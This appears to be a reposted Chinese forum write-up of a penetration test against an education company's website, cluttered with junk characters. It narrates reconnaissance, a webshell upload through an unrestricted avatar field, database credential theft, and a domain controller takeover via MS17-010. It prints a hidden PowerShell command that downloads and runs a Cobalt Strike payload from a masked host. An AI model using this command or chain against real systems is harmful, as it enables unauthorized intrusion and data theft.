|
/ y* a* ~" m' f/ ~, J1 A- t3 i! F 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路8 L1 O9 M7 C- ^- E& ^
- f C! {" E m
. {0 z+ u2 W f1 t % k: r/ d- `2 I9 I, K: I8 G
, N& Q7 N# d+ P8 e* B L
+ c6 l! K0 R" r, ^3 L3 _/ K6 u( r7 `
正文, h9 S# r; g- F
& U4 j1 j w$ T* A- Z% o0 k* C' h/ P
0 g; Y- S: V& [' P# T. G) T8 {
! n& `& j8 c( _9 H& {6 ]3 S6 @ j5 |0 p8 _- U4 L
% K" h+ Z: w. B* H2 g% H% p 目标:www.xxxx.com(一家教育机构)
, ^2 _% u: T1 J* X" ^8 t x8 u) K# \
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
9 Q% |8 R! D& x 0 ~! q+ u9 A l8 Y
! \& r. K& C# a
 ( S! d& G; q" X
/ B- N( V# ]. J+ L. w; I# V
7 q6 _( h' |4 K8 T0 p$ u2 ^8 d
进行了简单的信息搜集
/ M8 J; K0 o/ g' r) @. H1 j
6 l& K1 b8 I) L- {
* o5 @( X0 w8 x* v' Q
! T6 e' V9 d& X9 j" N! s/ i
* k6 s m# L* u. V# r 子域名搜集
4 u! s3 ^* h x, }; \ J * P$ }- l! m4 S3 j
! Z4 ^. B, y* W1 k$ D' l. r
" p- v+ c# _8 j* u4 H3 ~/ I' n5 I
* Q8 S. z* g5 e! j2 x' o3 g: t3 B7 B' E: |
fofa找资产
, [8 H1 E7 [# O: _
4 r3 A3 ]) R3 A# }. w _3 q* ^
" U1 ~# q3 V$ P' C! h2 E # Y2 s* }7 T8 H8 t; k
9 S& T/ P# i) p* e; [) L! b
# Y% P- e3 i4 b* e
0 z) e7 N8 c$ U9 f' \$ S% s
* ^9 L* h3 @, [3 z+ N 一共七个资产。去重之后只有两个。
. x' y& p3 h( y
0 x8 N8 r9 J1 U5 P" U
7 b; \" z1 S$ _; {2 O# L: h, w
. t- b3 z2 l3 W2 e/ Z/ }# q- a' ^9 Z+ ]! ]9 |
目录探测
* X" |! ^, d: g% x) Z
" B% Q4 x) ~+ |7 I! |' C0 K9 Y0 ]( c4 y; I Y: O
 & A& F+ A: v) n( z) P, @$ N
$ g- l0 z! @) v4 U# K A
9 `5 b/ Z1 m+ x' o& U# y7 v) e 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
) e7 Z$ F* u/ W) ~& O
( v6 ?* j8 V, b& L
) ~' f- f* Z0 q
9 F* v) w7 L+ F) ]% o, Y0 p) l( w
我又尝试了通过修改返回包来绕过登录界面7 @6 n$ w% I& Y" M/ E w
C& v1 `5 P$ S( G% `
3 P! }1 k* e3 w9 B+ ?
 5 ?& a6 \1 v! r! D& _9 Z n' ~
1 ~/ n9 a9 a \0 m$ D9 f: f& q4 N+ q
2 X8 E, Y3 p' f9 N# q$ f 还是不行,尝试注入无果
3 @' [' f; } x8 q! K1 o& I 9 T7 H' V) B/ C6 i. v+ Z. @
x' u) x( B( d9 w$ A( i/ E  0 w9 z3 C; m6 d* H
* G7 ], S) \& A! A0 ^1 \' C% X! W& h; n+ D! y( f+ c
不过我目录探测出了一处Spring信息泄露
: @# B9 y- ], G. `+ ?
* u5 R' Q# ~7 ~. h
9 N8 N. v U7 n. z. P1 q2 n0 D& ]" ^
1 [' m! y8 k, Q" K0 Q; \6 H% I
; {# E: R' ]+ [1 T! u7 n% S  . ~: Z2 F$ S, }$ \2 [9 f- I; B
! D9 R Z/ D$ Q9 k1 Q
/ w0 r9 H/ _) l6 d; k3 g8 N 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录- V% a. H5 ]* d& o
: e; ^) B) x7 H# b- n: k$ S! K$ S: }1 O3 h! p
 & R! p6 J- |; `6 O+ @
" r8 s9 ]9 [" d D! H3 C7 _: S- h
* l+ M7 F; @9 T; j% w
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) u. q7 ^' ^* {% |' C + u& S9 e* ~+ G
( L y- g! `; \) U  / i9 U) x I6 t0 h6 w+ T; R! [
" W2 a! o% _2 ~: }! o
# G% q$ ]9 f* S6 h8 q. l9 ~ 获取有些师傅到这一步就手机抓包电脑测了。
+ N& J5 d/ {& `) ^% r0 N- Z
7 n! R% j$ D: P8 x
* M0 g3 [) ]( q3 i( I1 I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: E; Y1 n% h& G! K7 B: [
+ B+ a/ e4 V p( N/ X) J- X% }& g' Y# v3 v9 J' e; s$ N a
其中在一个公众号发现了小程序,可以进行注册。8 s9 @0 m: \. g$ ]
7 e9 D7 |/ ^: M4 s* x: q
. }; ^. D' _" O5 U' J# Y: X& h 看到了头像上传,尝试上传获取WebShell
( J3 Z1 W8 F- Z- m5 u& { ( ~1 {6 o9 }7 ?: ^
, b5 n4 q2 N3 E# S% r- U' d" C T  % P% [, R% z# {# V# \
- e! R7 D7 b0 Q$ B" j0 t' S2 U/ H
$ a# s* i& u5 A# z" J1 x 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问& t1 M5 [0 s* }$ U; f/ U1 r
+ A5 l. L7 [6 X5 i
W1 w: e0 N' g$ }3 V J7 x  4 o* x" l( q$ ~2 }# Y
1 s" Z* d; F9 k5 M
/ {4 p7 S5 _; q6 F/ x 然后上了大马# f* ?- V6 c I) C/ v: j
$ V2 m( W9 L: _
2 S6 m# \: s. K- X( }" M& ] 
5 _ X6 U p d4 K4 c
. g# u! w: `( y3 v c, S& O5 D. H3 T7 x2 M% l
; M4 U+ V: @' X! J5 ?% [' X- u
' L$ A8 @, U9 }, A
# _7 m$ D+ X* n 通过翻找文件发现数据库账号密码
7 j S% ^* X! i' ~2 {8 n
' o7 j! p" G9 o3 ~9 e
3 z2 I$ y7 O2 t, u6 G# G  # H7 S+ Z+ M6 q& k' @& F4 W
( d: p; x w) b0 }& z$ ]0 u& X) j8 r8 u/ n# p) s" v
--内网渗透
. z7 W( u4 ?6 a$ j
% _$ E k* X* j2 X2 B( I
3 s0 x% r7 I" ]$ M3 ` 直接通过powershell执行 cs上线 y: t; U- t' Z" M: e- r4 l
; A( l. K/ \; a& y
' U. s0 y9 {) {' l
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" c8 W) a! U& P. V/ e t
2 Q- P$ r* r& U& r, r& s$ C# X: Y
$ j4 ~* f9 f* x i 
4 a$ n, K0 J, T$ O4 `2 A3 Z ; L6 R, Q+ T; e$ l3 S
+ P. M" z, `2 q 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
9 g3 m t1 O" @9 O7 m4 x
8 E( K) A8 u0 n( r7 h- g7 y& @5 [% r( y
W. v" P3 @( H+ u# \/ p$ [  8 b2 g& U* p8 L% z+ i
& q7 C& p3 p( m: a
( S. I0 {% C6 a0 G, U- T& X 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" o! D- C# y& i1 S, X' ]4 O- X2 Z
: }/ y0 @, k4 @; N
, ~9 r; ^& w, N- B( T
9 d% X' }- r" H& ~$ @' T3 L8 ?3 C; \ , r* a, O) U. C K" C& s
) Z8 s: K& e2 G3 K, u# c3 }
$ Q( x0 G2 I- P; k7 R: j
- `! T7 d! I' R. C; K1 A, ~; _
) n" f" Q9 Z# E& R1 d4 c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 q/ P W7 {1 L# d- y0 p; J
" Q6 A7 p. T" J4 F% u4 g$ u: f. w6 H- @" K; F+ y, Z
% L* H. d, V: U
* k) } r6 C7 x5 Y6 b  8 U. O+ s4 S! ~+ t' S
+ D( i: U( {6 v9 i0 X8 l
d% a0 z: H; z ?; [- p
# r% G) a" q, @' O5 y- V
4 g: W1 E( ~& t' ~+ h7 l' |% N
+ [$ ]; Q; j" e" s4 w) H) K
5 ~7 U! T3 s; [0 D" F
$ f5 S+ m% H8 e9 c L) \
* T6 s* d9 o1 b7 Y* t# x1 c% J
/ V5 `4 D% w# }5 U4 Q) J- [) ?4 L: X9 H4 A$ B4 ~5 i$ K
小结5 T6 h2 [8 J( g: M; D
3 X6 M; S9 N6 N. w& K$ F
6 J. _ A, R8 Y9 U: A; a* `" L
: `. Q. | ?8 ^/ r$ b$ y 7 w: p9 O" v9 h% E; F9 `
7 b' d9 g3 p3 K 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
. s2 o8 p9 w7 I% N# M
! c; t& q* O; u2 w/ L
: a G3 M' ^# I5 ~) _7 Y- [! g & a: b/ `6 z7 X e0 H4 n. \3 J
7 _7 Y% r" b6 A
+ _! u G$ o4 u- j" Q1 h3 I -
/ z6 u" m; p0 v: q
& F* T+ u0 \0 j
6 P: h0 }5 u6 J# i! C - - y; W ]' g6 s7 I5 D7 z
$ Z' J1 K( k/ C0 L; g
- i. k7 k3 V+ o' S+ K/ ^
* o1 B' E$ r y, ^% ^( B9 Q5 ~, D# j
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* \8 ^; X, J/ G7 n) K4 x- L
1 x% R6 }; U# l
, n5 v) c7 ]* e$ i# [+ c
: N& x! X' `) O% L$ [$ d; O* g
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对